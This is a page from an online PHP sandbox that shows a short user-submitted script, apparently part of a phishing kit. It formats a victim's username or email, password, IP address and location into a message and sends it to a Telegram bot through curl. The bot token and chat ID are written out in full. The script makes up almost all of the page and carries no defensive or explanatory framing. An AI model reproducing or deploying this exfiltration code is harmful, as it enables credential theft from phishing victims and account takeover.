test - PHP Online

Form of PHP Sandbox

Enter Your PHP code here for testing/debugging in the Online PHP Sandbox. As in the usual PHP files, you can also add HTML, but do not forget to add the tag <?php in the places where the PHP script should be executed.



Your result can be seen below.

Result of php executing





Full code of test.php

  1. <?php
  2.    
  3.    $urlnya="https://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]/sigerrr.txt";
  4.                       $token='2061923472:AAHLHDscmCd5WS00g5ETw-DHLw8jzimKuvg';
  5.                       $chatid='1670422847'; // ganti chat id 
  6.                       $pesan=urlencode("
  7.                                           \n=========(sc byRANS)=========\n
  8.                                           Ganteng Izin Kirim Result hari ini $tgl PART 1\n
  9.                                           Username/ Email    : $email \n
  10.                                           Passwrod                  : $pass \n
  11.                                           ========= INFO IP : $ip \n
  12.                                           Negara                     : $c \n 
  13.                                           Provinsi                   : $b \n 
  14.                                           Kota                                : $a \n 
  15.                                           Jam Masuk                  : $tgl \n 
  16.                                           URL                         : $urlnya \n 
  17.                                           \n=========(sc byRANS)=========");
  18.                      
  19.                       $API = "https://api.telegram.org/bot".$token."/sendmessage?chat_id=".$chatid."&text=$pesan";
  20.                       $ch = curl_init();
  21.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22.                       curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
  23.                       curl_setopt($ch, CURLOPT_URL, $API);
  24.                       $result = curl_exec($ch);
  25.                       curl_close($ch);
File Description
  • test
  • PHP Code
  • 25 Aug-2023
  • 1.08 Kb
You can Share it: